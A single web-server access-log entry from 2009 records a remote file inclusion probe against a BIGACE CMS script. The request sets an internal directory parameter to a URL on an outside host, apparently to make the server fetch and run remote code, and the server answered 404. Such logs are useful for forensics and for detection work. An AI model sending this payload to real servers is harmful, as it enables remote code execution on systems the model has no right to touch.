219.85.63.226 - - [07/Sep/2009:10:02:14 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
